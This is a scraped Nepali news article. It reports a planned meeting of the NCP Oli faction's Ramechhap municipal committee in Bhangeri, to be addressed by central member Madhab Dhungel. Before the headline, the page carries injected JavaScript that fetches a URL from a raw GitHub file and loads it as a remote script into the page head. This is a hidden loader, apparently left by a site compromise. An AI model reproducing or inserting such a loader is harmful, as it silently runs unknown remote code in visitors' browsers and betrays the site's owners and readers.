;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); भोली भङगेरीमा ओली समूहको रामेछाप नगर कमिटी भेला : केन्द्रीय सदस्य माधब ढुङ्गेलले सम्बोधन गर्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • भोली भङगेरीमा ओली समूहको रामेछाप नगर कमिटी भेला : केन्द्रीय सदस्य माधब ढुङ्गेलले सम्बोधन गर्ने
ट्रेन्डिङ

भोली भङगेरीमा ओली समूहको रामेछाप नगर कमिटी भेला : केन्द्रीय सदस्य माधब ढुङ्गेलले सम्बोधन गर्ने

माघ ०८,

रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) ओली समूहले भोली (शुक्रबार) रामेछाप नगरको संगठन कमिटी भेला तथा तेस्रो पुर्ण बैठक डाकेको छ ।

शुक्रबार नेकपाका केन्द्रीय सदस्य माधब ढुङगेलले भेलालाई सम्बोधन गर्ने सोसमूहले जनाएको छ । बिहान ११ बजे पुष्पलाल पार्क भङगेरीमा भेला आयोजना गरेको हो ।

गाउँपालिकाहरुमा आफ्नो समूहको कमिटी गठनलाई वडा तहसम्म पुर्याएको समूहले भेला आयोजना गरेको हो । यसअघि मन्थली नगरपालिका सहित खाँडादेवी, लिखु तामाकोशी गाउँपालिकामा यो समूहले आफ्नो भेला सम्पन्न गरिसेकेको छ ।

Image may contain: 4 people, text that says '1 "मार्क्सवाद, लेनिनवाद जिन्दावाद" "जनताको बहुदलीय जनवाद जिन्दावाद" नेपाल कम्युनिष्ट पार्टी (नेकपा) रामेछाप तेसो रामेद्ाप नगर कमिटी बैठक तथा भेला प्रमुख वक्ता: क. माधब दड्लेल नेकपा केन्द्रिय सदस्य मिति: ২०७७ माघ 0c गते शुक्रवार स्थान: पुष्पालाल पार्क रामेछाप भड्ञेरी समय: १9 00 बजे आयोजक नेपाल कम्युनिष्ट पार्टी रामेछाप नगर कमिटी'

फेसबुक प्रतिक्रियाहरु